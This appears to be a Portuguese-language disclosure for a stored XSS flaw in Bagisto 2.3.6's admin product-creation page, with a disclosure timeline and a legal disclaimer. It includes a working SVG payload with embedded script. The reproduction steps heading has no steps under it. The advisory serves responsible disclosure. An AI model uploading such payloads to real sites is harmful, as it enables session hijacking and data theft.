
Prova de conceito para uma vulnerabilidade de XSS armazenado no painel administrativo do Bagisto, demonstrando upload de SVG com JavaScript malicioso e fornecendo recomendações de mitigação.
Existe uma vulnerabilidade de XSS armazenado autenticado no caminho de criação de produtos do painel administrativo do Bagisto 2.3.6, permitindo que um atacante envie um arquivo SVG manipulado contendo código JavaScript malicioso. Esta vulnerabilidade pode ser explorada por um usuário administrador autenticado para executar JavaScript arbitrário no navegador, potencialmente levando ao sequestro de sessão, roubo de dados ou ações não autorizadas.
A vulnerabilidade é explorada quando um administrador autenticado envia um arquivo SVG manipulado contendo JavaScript malicioso.
Etapas para Reproduzir:
Exemplo de Payload SVG Malicioso:
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert(document.domain);
</script>
</svg>
| Data | Ação |
|---|---|
| AGO 2025 | Vulnerabilidade Descoberta |
| AGO 2025 | Divulgação Responsável |
| AGO 2025 | ID CVE Solicitado à MITRE |
| OUT 2025 | CVE Atribuído, Divulgação Pública |
As informações e o código de prova de conceito (PoC) fornecidos neste repositório são apenas para fins educacionais e de pesquisa ética. O autor não é responsável por qualquer uso indevido ou dano causado pelas informações ou código aqui fornecidos. O usuário assume toda a responsabilidade por suas ações. É responsabilidade do usuário garantir que está em conformidade com todas as leis locais, estaduais e federais aplicáveis.